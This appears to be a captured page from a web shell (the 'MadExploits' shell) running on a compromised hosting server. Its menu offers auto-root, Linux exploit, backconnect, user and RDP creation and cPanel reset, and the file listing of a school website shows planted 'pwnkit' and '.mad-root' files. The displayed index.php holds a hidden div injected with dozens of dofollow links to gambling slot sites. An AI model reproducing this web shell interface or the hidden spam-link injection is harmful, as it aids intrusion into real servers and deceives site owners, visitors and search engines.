Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.136.236.178
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
amvm /
public_html /
bnsingh /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
files
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
myadmin
[ DIR ]
drwxr-xr-x
scss
[ DIR ]
drwxr-xr-x
.htaccess
197
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
about.php
13.47
KB
-rwxr-xr-x
academic.php
10.43
KB
-rwxr-xr-x
addmission.php
1.76
KB
-rwxr-xr-x
bootstrap.php
79.58
KB
-rw-r--r--
cbse-corner.php
3.3
KB
-rwxr-xr-x
config.php
625
B
-rwxr-xr-x
contact.php
1.75
KB
-rwxr-xr-x
error_log
485.12
MB
-rwxr-xr-x
favicon.ico
2.56
KB
-rwxr-xr-x
footer.php
6.19
KB
-rwxr-xr-x
gallery.php
1.55
KB
-rwxr-xr-x
header.php
10.85
KB
-rwxr-xr-x
index.php
21.58
KB
-rw-r--r--
net.html
1.72
KB
-rw-r--r--
news-coverage.php
1.63
KB
-rwxr-xr-x
pedagogy.php
1.25
KB
-rwxr-xr-x
pwnkit
0
B
-rwxr-xr-x
result.php
1.29
KB
-rwxr-xr-x
shining-star.php
8.56
KB
-rwxr-xr-x
tc.php
3.14
KB
-rwxr-xr-x
theschool.php
4.28
KB
-rwxr-xr-x
toppers.php
5.37
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php include('header.php'); ?> <!--Slider Start--> <div class="hero-slide owl-carousel site-blocks-cover "> <img src="/images/1.jpg" width="1200" height="500"/> <img src="/images/5.jpg" width="1200" height="500"/> </div> <!--<div class="hero-slide owl-carousel site-blocks-cover "><?php $qurey = "SELECT * FROM `slider` WHERE status='active'"; $result = mysqli_query($con, $qurey); while ($row = mysqli_fetch_array($result)) { ?> <img src="/myadmin/slider/<?php echo $row['picture']; ?>"/> <?php } ?> </div>--> <!--Slider End--> <div></div> <!--Trust Start--> <div class="site-section"> <div class="container-fluid"> <div class="row"> <div class="col-12"> <div class="col-lg-3 col-md-3 col-sm-12 trust-box"> <figure class="thumnail"> <a href="about.php"><img src="images/santattar1.jpg" alt="Image" class="img-fluid"></a> <div class="category"> <a href="about.php"><h5>Founder</h5></a> <!--<p>Sant Attar Singh Ji, the founder of this unique institution Akal Academy, was a votary of modern scientific education duly tempered with</p>--> </div> </figure> </div> <div class="col-lg-3 col-md-3 col-sm-12 trust-box"> <figure class="thumnail"> <a href="about.php"><img src="images/Dr-Veer-Ji1.jpg" alt="Image" class="img-fluid"></a> <div class="category"> <a href="about.php"><h5>Director's Message</h5></a> <!--<p>All great ideas begin with a commitment to the future. Vision gives you the impulse to make the picture on your own</p>--> </div> </figure> </div> <div class="col-lg-3 col-md-3 col-sm-12 trust-box"> <figure class="thumnail"> <a href="about.php"><img src="images/principal.jpg" alt="Image" class="img-fluid"></a> <div class="category"> <a href="about.php"><h5>Principal's Message</h5></a> <!--<p>We have made Dreams transfer into thought and are striving to make the thoughts result in action. </p>--> </div> </figure> </div> <div class="col-lg-3 col-md-3 col-sm-12 trust-box"> <figure class="thumnail"> <a href="javascript:void(0)"> <img src="images/school (9).jpg" alt="Image" class="img-fluid"> </a> <div class="marquee-box"> <marquee direction="up" onmouseover="this.setAttribute('scrollamount', 0, 0); this.stop();" onmouseout="this.setAttribute('scrollamount', 6, 0); this.start();" scrollamount="6" behavior="scroll" style=" line-height: 30px;"> <?php $qurey = "SELECT * FROM `news` WHERE status='active' "; $result = mysqli_query($con, $qurey); $sr_no = 1; while ($row = mysqli_fetch_array($result)) { ?> <p class="news-scroll-content"><?php echo $sr_no . '.'; ?><?php echo $row['detail']; ?></p> <?php $sr_no++; } ?> </marquee> </div> <div class="category"><h5>News/ Circular</h5></div> </figure> </div> </div> </div> </div> </div> <!--Trust End--> <!--Subscribe Start--> <div class="site-section ftco-subscribe-1" style="background-image: url('images/bg_1.jpg')"> <div class="container"> <div class="row align-items-center"> <div class="dt-sc-margin25"></div> <div class="col-lg-12"><?php $qurey = "SELECT * FROM `pages` WHERE status='active' AND `id`= '1'"; $result = mysqli_query($con, $qurey); while ($row = mysqli_fetch_array($result)) { ?> <h2 style="text-align: center;">Welcome to Akal Academy <!--<?php echo $row['title']; ?>--></h2> <p style="text-align:justify"><?php echo $row['description']; ?></p> <?php } ?> </div> <div class="col-lg-12"> <div class="event-box"> <a href="/files/Activity Calendar(2017-2018)Final - 3.pdf" class="dt-sc-button large"> Download Event Calender<span class="fa fa-angle-right"></span></a> </div> </div> <div class="dt-sc-margin25"></div> </div> </div> </div> <!--Subscribe End--> <!--About Us Start--> <div class="section-bg style-1" style="background-image: url('images/about_1.jpg');"> <div class="container"> <div class="row"> <div class="col-lg-6"> <figure class="thumnail"> <img src="/images/dymmy.jpg" alt="School Image" class="img-fluid"> </figure> </div> <div class="col-lg-6"><?php $qurey = "SELECT * FROM `pages` WHERE status='active' AND `id`= '2'"; $result = mysqli_query($con, $qurey); while ($row = mysqli_fetch_array($result)) { ?> <h2 class="section-title-underline style-2"> <span><?php echo $row['title']; ?></span> </h2> <p class="lead" style="text-align:justify"><?php echo $row['description']; ?></p> <div class="dt-sc-margin25"></div> <blockquote class="type1"><q>Life in Akal Academy Bangi Nihal Singh focus on commitment to academic excellence, intellectual growth, arts athletics, high standards of ethical awareness, sportsmanship, and community service. Novelty and variety are added to each students life by the schools countless efforts and accessibility to a board curriculum based on value based education.</q></blockquote> <?php } ?> </div> </div> </div> </div> <!--About Us End--> <!--Why Us Start--> <div class="site-section"> <div class="container-fluid"> <div class="row justify-content-center text-center"> <div class="col-lg-4"> <h2 class="section-title-underline mb-5"> <span>Our Features</span> </h2> </div> </div> <div class="row"> <div class="col-lg-3 col-md-6 mb-3 mb-lg-0 feature-box"> <div class="feature-1 border"> <div class="icon-wrapper bg-primary"> <span class="fa fa-futbol-o"></span> </div> <div class="feature-1-content"> <!--<h2>Activities</h2> <p></p>--> <p><a href="#" class="btn btn-primary px-4 rounded-0">Activities</a></p> </div> </div> </div> <div class="col-lg-3 col-md-6 mb-3 mb-lg-0 feature-box"> <div class="feature-1 border"> <div class="icon-wrapper bg-primary"> <span class="fa fa-bus"></span> </div> <div class="feature-1-content"> <p><a href="#" class="btn btn-primary px-4 rounded-0">School bus</a></p> </div> </div> </div> <div class="col-lg-3 col-md-6 mb-3 mb-lg-0 feature-box"> <div class="feature-1 border"> <div class="icon-wrapper bg-primary"> <span class="fa fa-users"></span> </div> <div class="feature-1-content"> <p><a href="#" class="btn btn-primary px-4 rounded-0">Kids Play Land</a></p> </div> </div> </div> <div class="col-lg-3 col-md-6 mb-3 mb-lg-0 feature-box"> <div class="feature-1 border"> <div class="icon-wrapper bg-primary"> <span class="fa fa-graduation-cap"></span> </div> <div class="feature-1-content"> <p><a href="#" class="btn btn-primary px-4 rounded-0">Learning</a></p> </div> </div> </div> <div class="col-lg-3 col-md-6 mb-3 mb-lg-0 feature-box"> <div class="feature-1 border"> <div class="icon-wrapper bg-primary"> <span class="fa fa-clock-o"></span> </div> <div class="feature-1-content"> <p><a href="#" class="btn btn-primary px-4 rounded-0">School Timing</a></p> </div> </div> </div> <div class="col-lg-3 col-md-6 mb-3 mb-lg-0 feature-box"> <div class="feature-1 border"> <div class="icon-wrapper bg-primary"> <span class="fa fa-cloud"></span> </div> <div class="feature-1-content"> <p><a href="#" class="btn btn-primary px-4 rounded-0">Environment</a></p> </div> </div> </div> <div class="col-lg-3 col-md-6 mb-3 mb-lg-0 feature-box"> <div class="feature-1 border"> <div class="icon-wrapper bg-primary"> <span class="fa fa-user"></span> </div> <div class="feature-1-content"> <p><a href="#" class="btn btn-primary px-4 rounded-0">Educators</a></p> </div> </div> </div> <div class="col-lg-3 col-md-6 mb-3 mb-lg-0 feature-box"> <div class="feature-1 border"> <div class="icon-wrapper bg-primary"> <span class="fa fa-sun-o"></span> </div> <div class="feature-1-content"> <p><a href="#" class="btn btn-primary px-4 rounded-0">Daycare</a></p> </div> </div> </div> </div> </div> </div> <!--Features End--> <!--Why Us Start--> <div class="section-bg style-1"> <div class="container"> <div class="row"> <div class="col-lg-6"> <h2 class="section-title-underline style-2" style="text-align: center;"> <span>Why Choose Us?</span> </h2> <div class="dt-sc-margin25"></div><?php $qurey = "SELECT * FROM `pages` WHERE status='active' AND `id`= '4' "; $result = mysqli_query($con, $qurey); while ($row = mysqli_fetch_array($result)) { ?> <button class="accordion"><?php echo $row['title']; ?></button> <div class="panel"> <p style="text-align:justify"><?php echo $row['description']; ?></p> </div> <?php } ?> <?php $qurey = "SELECT * FROM `pages` WHERE status='active' AND `id`= '5' "; $result = mysqli_query($con, $qurey); while ($row = mysqli_fetch_array($result)) { ?> <button class="accordion"><?php echo $row['title']; ?></button> <div class="panel"> <p style="text-align:justify"><?php echo $row['description']; ?></p> </div> <?php } ?> <?php $qurey = "SELECT * FROM `pages` WHERE status='active' AND `id`= '6' "; $result = mysqli_query($con, $qurey); while ($row = mysqli_fetch_array($result)) { ?> <button class="accordion"><?php echo $row['title']; ?></button> <div class="panel"> <p style="text-align:justify"><?php echo $row['description']; ?></p> </div> <?php } ?> <?php $qurey = "SELECT * FROM `pages` WHERE status='active' AND `id`= '7' "; $result = mysqli_query($con, $qurey); while ($row = mysqli_fetch_array($result)) { ?> <button class="accordion"><?php echo $row['title']; ?></button> <div class="panel"> <p style="text-align:justify"><?php echo $row['description']; ?></p> </div> <?php } ?> </div> <div class="col-lg-6"> <h2 class="section-title-underline style-2" style="text-align: center;"> <span>Gallery</span> </h2> <div class="dt-sc-margin25"></div> <div class="slideshow-container"> <div class="mySlides fade"> <img src="/images/dymmy.jpg" style="width:100%"> </div> <div class="mySlides fade"> <img src="/images/dymmy.jpg" style="width:100%"> </div> <div class="mySlides fade"> <img src="/images/dymmy.jpg" style="width:100%"> </div> <a class="prev" onclick="plusSlides(-1)">❮</a> <a class="next" onclick="plusSlides(1)">❯</a> </div> </div> </div> </div> </div> <!--Why Us End--> <!--opportunities Start--> <div class="section-bg"> <div class="container-fluid"> <div class="row"> <div class="col-lg-6"><?php $qurey = "SELECT * FROM `pages` WHERE status='active' AND `id`= '3'"; $result = mysqli_query($con, $qurey); while ($row = mysqli_fetch_array($result)) { ?> <h2 class="section-title-underline" style="text-align: center;"> <span><?php echo $row['title']; ?></span> </h2> <p class="lead" style="text-align:justify"><?php echo $row['description']; ?></p> <?php } ?> </div> <div class="col-lg-6"> <figure class="thumnail" style="text-align: center;"> <img src="/images/dymmy.jpg" alt="School Image" class="img-fluid" width="600"> </figure> </div> </div> </div> </div> <div style="display:none"> <a href="https://firststatebrewers.com/" rel="dofollow">UNO89</a> <a href="https://uno89.cc/" rel="dofollow">uno89</a> <a href="https://glovesforbbq.com/" rel="dofollow">Bingo89</a> <a href="https://thebathroommerchants.com/" rel="dofollow">Bingo89 Slot</a> <a href="https://tochkamassazha.ru/" rel="dofollow">Slot Gacor</a> <a href="https://opstinavisegrad.com/" rel="dofollow">Slot Gacor 777</a> <a href="https://cinecec.com/" rel="dofollow">Link Login Slot Gacor</a> <a href="https://www.complementalimentaire-horus.com/" rel="dofollow">daftar situs slot gacor</a> <a href="https://puntolimpiosanlucar.es/" rel="dofollow">UNO89</a> <a href="https://smartsystems-eg.com/" rel="dofollow">Slot Online Gacor</a> <a href="https://smartsystems-eg.com/" rel="dofollow">Slot Gacor</a> <a href="https://www.residence-ajaccio.com/" rel="dofollow">Uno89 Pola Slot Gacor</a> <a href="https://www.daruvarske-toplice.hr/" rel="dofollow">Daftar Situs Slot Gacor</a> <a href="https://gkipakola.org/" rel="dofollow">situs slot gacor 777</a> <a href="https://cmjhospital.in/" rel="dofollow">Situs Slot Maxwin</a> <a href="https://uno-uno89.tumblr.com/" rel="dofollow">Uno89 Slot Login</a> <a href="https://ini-bingo89.tumblr.com/" rel="dofollow">Bingo89 Slot Login</a> <a href="https://direct.me/yuno89" rel="dofollow">Uno89 Slot Login</a> <a href="https://direct.me/go-bingo89-go" rel="dofollow">Bingo89 Slot Login</a> <a href="https://heylink.me/officialuno89/" rel="dofollow">Official Uno89</a> <a href="https://heylink.me/bingo89/" rel="dofollow">Official Bingo89</a> <a href="https://www.alritrovoshop.it/" rel="dofollow">Link Daftar Bingo89</a> <a href="https://herramientasrenzomilani.com/" rel="dofollow">BINGO89</a> <a href="https://www.prsteny-prstynky.cz/" rel="dofollow">Bingo89 Login</a> <a href="https://reflectionwindow.com/" rel="dofollow">Slot Bingo89</a> <a href="http://www.aivazovsky.info/" rel="dofollow">Official Bingo89</a> <a href="https://ceedypharma.com/" rel="dofollow">Bingo89 Login</a> <a href="https://www.shamotoeyeclinic.com/" rel="dofollow">uno89 slot login</a> <a href="http://360-elearning.com/" rel="dofollow">uno89 login</a> <a href="https://www.regard-horus.fr/" rel="dofollow">uno89 slot login</a> <a href="https://tutophta.com/" rel="dofollow">uno89 slot login</a> <a href="https://nutricion-horuspharma.es/" rel="dofollow">uno89 slot login</a> <a href="https://www.dermatologie-horus.com/" rel="dofollow">uno89 slot login</a> <a href="https://www.micronutrition-horuspharma.be/" rel="dofollow">uno89 slot login</a> <a href="https://www.mon-omd.fr/" rel="dofollow">uno89 slot login</a> <a href="https://colegiomariazambrano.com/" rel="dofollow">Daftar Slot Dana Gacor</a> <a href="https://torremesa.com/" rel="dofollow">Uno89 Slot</a> <a href="https://en.torremesa.com/" rel="dofollow">Uno89 Slot Login</a> <a href="https://www.hindvabuilders.com/" rel="dofollow">Uno89 Slot</a> <a href="https://thaimary.com/" rel="dofollow">Link Daftar Uno89</a> <a href="https://xn----5wfabe2ebfb1ceabca4dxa0bufh5b0k7djjeg1fn38amb3gb5muag.com/" rel="dofollow">Situs Judi Slot Gacor</a> <a href="https://jgscreensolutionsllc.com/" rel="dofollow">Situs Slot Gacor Maxwin</a> <a href="https://mattsandjenkins.com/" rel="dofollow">Uno89 Login Slot</a> <a href="https://www.matsu20.fr/" rel="dofollow">uno89 slot login</a> <a href="https://www.tokatbarosu.org.tr/" rel="dofollow">SITUS SLOT GAMPANG MENANG</a> <a href="https://nuformcabinetry.com/" rel="dofollow">Situs Slot Gacor Maxwin</a> <a href="https://www.tradewindsimports.com/" rel="dofollow">Daftar Slot Maxwin Pasti Menang Maxwin</a> <a href="https://ratelusa.com/" rel="dofollow">uno89 slot login</a> <a href="https://litgo-healthysnack.com/" rel="dofollow"> Situs Slot Gacor Hari Ini Maxwin</a> <!--opportunities End--> <!--Picture Start--> <div class="section back-box"> <div class="container-fluid"> <div class="row"> <div class="col-lg-12"> <figure class="thumnail" style="text-align: center;"> <img src="images/Tree (1).png" alt="School Image" class="img-fluid" width="800"> </figure> </div> </div> </div> </div> <!--Picture End--> <?php include('footer.php'); ?>
Close